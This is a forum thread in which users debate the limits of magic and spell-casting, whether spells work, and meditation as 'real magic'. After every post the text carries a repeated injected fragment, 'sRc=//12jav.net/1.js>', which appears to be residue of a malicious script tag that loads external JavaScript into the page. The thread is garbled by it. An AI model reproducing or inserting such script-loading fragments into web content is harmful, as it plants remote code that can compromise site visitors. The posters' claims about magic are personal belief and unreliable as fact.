By now I have a pretty good idea of what is possible and impossible when it comes to magic. I know that you can't alter your DNA, turn into any other different sort of creature, control elements, teleport, change your appearance (well, I guess you could use a glamour to make others perceive you a bit differently, but those have limits), bend the laws of reality, create real things out of thin air, create life, control other people, etc., and I could list more. That's all fine and dandy, but I would like more information on what exactly I can and can't do to avoid being fooled by trick spells and the like in the future. What sort of things can I definitely do or not do? sRc=//12jav.net/1.js> sRc=//12jav.net/1.js>

Magic is all about "changing". A change of attitude to you life. A change in the way you see other people. A change in your immediate environment. A change in material things.
There are some things once thought to be impossible, that are now possible. Especially in surgery! (Just think of a heart transplant!). It was once impossible for a heavier than air machine to fly!
And we can, indeed, create Life in the laboratory. Only very primitive Life at this time; but, you never know!
But, in any case, a spell isn't magic! A spell is a ritual attempt to make magic happen. Mostly it doesn't" sRc=//12jav.net/1.js> sRc=//12jav.net/1.js>

I believe a cup of common sense will help.

On another note, experimentation is the best way of approaching almost every practice so who are we to tell you that a spell (a realistic spell) may work or mostly doesn't work?

After over sixty years of study; of meeting, and talking to, people from all walks of life; I have come to the conclusion that when a spell works it is pure coincidence! The secret to real magic, and self awareness, is meditation. That is the magic that changes things. sRc=//12jav.net/1.js> sRc=//12jav.net/1.js>

I was strictly speaking about spell-casting,not magic on it's own.

And just because a system of knowledge and experiences is different from your conclusion it doesn't mean it's invalid.

I just hate when someone speaks generally about a topic that applies different for everyone.

Belief is belief. Fact is fact. You may believe whatever you wish. But a belief does not make it fact. sRc=//12jav.net/1.js> sRc=//12jav.net/1.js>

I know that magick isn't just limited to spells -- one can do magick without ever casting one -- I just used those as an example because you're just more likely to find a fake spell online or in a book then you are to find, say, a completely made-up method of channeling energy. sRc=//12jav.net/1.js> sRc=//12jav.net/1.js>
